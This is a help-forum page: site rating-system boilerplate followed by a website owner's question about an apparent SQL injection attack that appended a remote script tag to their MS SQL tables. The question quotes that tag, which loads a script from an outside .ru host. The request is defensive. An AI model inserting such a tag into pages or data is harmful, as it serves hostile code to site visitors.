The Solution Rating System

With so many solutions, how can you tell which solutions are most likely to help you and which ones are not? To provide you with a tool to use, we rate our solutions based on various elements that most accurately determine if a solution is a quality solution. To explain what factors affect the solution rating, here are the elements we take into consideration when formulating our solution rating.

  • The Grade of the Solution
  • The Zone Rank of the Expert Providing the Solution
  • The Number of Author and Expert Comments
  • The Number of Experts Contributing
  • The Feedback of the Community

Your Input Matters
Because of the way the system is set up, the most important variable in this equation is you. As a member of Experts Exchange, you are able to cast your vote on the quality of the solutions in regard to how complete, accurate, helpful and easy to understand each solution is. When you provide your feedback, each rating is adjusted accordingly. So, if you see a solution that has a poor rating that you think is a good solution, let us know by rating it. As you do, the rating will be adjusted and will become more accurate for other members of our site.

If you have any suggestions that you would like to make for our rating system, please ask a question in the Suggestions Zone of Community Support.

Thank you!

I need a function that will check any SELECT, INSERT or UPDATE statement for a specific string and NOT include it in the statement.

Asked by rentawebguy in Active Server Pages (ASP), Microsoft IIS Web Server

Somehow, something or someone is inserting the phrase "<script src="http://www.jic2.ru/script.js"></script>" into all my MS SQL tables appending itself at the end of the data.

My site has several hundred users who insert and edit classifieds, etc.

I do not know if this is a SQL injection attack or if one of these users has a virus that is inserting this line when they submit a form.  The strange thing is that one of my tables is not even used on the site (it has no public facing form either) and it was infected as well.

I've read elsewhere that I probably need to parameterize my SQL statements. The site was not written by me but I plan to do that as soon as I stop these attacks (this has happened twice in the past 4 days but luckily I had a backup of the database).

As an immediate band-aid fix is there a function that I can put in my header so that whenever a SELECT, UPDATE or INSERT statement is called for any field, that it checks the incoming data and if it contains "<script" it either discards it, replaces it with nothing OR redirects the user to a 404 page?

Also, any information on how this attack is done (SQL Injection via querystring?) would be helpful so I can test my pages once I learn how to parameterize my SQL statements.
